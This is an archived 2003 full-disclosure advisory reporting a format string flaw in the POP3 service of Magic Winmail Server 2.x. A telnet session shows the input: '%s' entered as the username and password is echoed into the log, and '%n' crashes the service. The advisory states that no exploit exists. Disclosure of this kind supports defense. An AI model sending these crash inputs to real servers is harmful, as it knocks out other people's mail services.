Magic Winmail Server v.2.*: format string

From: D4rkGr3y (grey_1999at_private)
Date: Sat May 24 2003 - 15:33:53 PDT

Next message: Gyrniff: "iisPROTECT SQL injection in admin interface"

Previous message: Joe Testa: "[Full-Disclosure] Re: QuickTime/Darwin Streaming Server security issues"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

################################################################*
#          Damage Hacking Group security advisory
#                     www.dhgroup.org
################################################################*
#Product: Magic Winmail Server
#Auth: AMAX Information Technologies Inc. [www.magicwinmail.net]
#Vulnerable versions: v.2.* (founded in 2.3)
#Vulnerability: format string
################################################################*

#Overview#------------------------------------------------------#
Magic Winmail Server is a professional and easy-use mail server
software, supporting SMTP,POP3,WebMail,anti-virus,multiple
domains,SMTP authentication,remote control, spam filter,user
and domain alias, quotas, mail group, mail route. Magic Winmail
can serve not only as LAN mail server, Internet Mail server,
but also as mail server or gateway switching in with ISDN, xDSL,
Cable Modem.

#Problem#-------------------------------------------------------#
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %s
+OK
pass %s
- -ERR authorization failed


Connection to host lost.

C:\>type Progra~1\magicw~1\server\logs\pop3.log
2105/Y-19:48:50   2716 Connect from 127.0.0.1
2105/Y-19:48:57   1336 ?-???? not exist

C:\>                   ^^^^^^
                         %s
#########now let's kill it

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
- -ERR authorization failed


Connection to host lost.

C:\>telnet 127.0.0.1 110
Connecting To 127.0.0.1...Could not open connection to the host,
on port 110. No connection could be made because the target
machine actively refused it.

C:\>

#Exploit#--------------------------------------------------------#
none

#wow#------------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPs/zS24LIpseSJmPAQGSPQP+Lu8vaa7UhQG09Wx3hGHsugm6dLR25jwM
kiEdg8pWuX5iMeloFVm91mjyuw5jrWpT1khNbdntZcyQ3Xxs9I/v4szYH/Lfh/fP
GUoE0Ek3aM2oxmpktisB9g/KFoMmOhSskv0AEOwTKEVMPCRS8GWZrrbJERfDcevY
f55hQN4jzSA=
=t1jb
-----END PGP SIGNATURE-----

Next message: Gyrniff: "iisPROTECT SQL injection in admin interface"
Previous message: Joe Testa: "[Full-Disclosure] Re: QuickTime/Darwin Streaming Server security issues"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 23 2003 - 08:58:17 PDT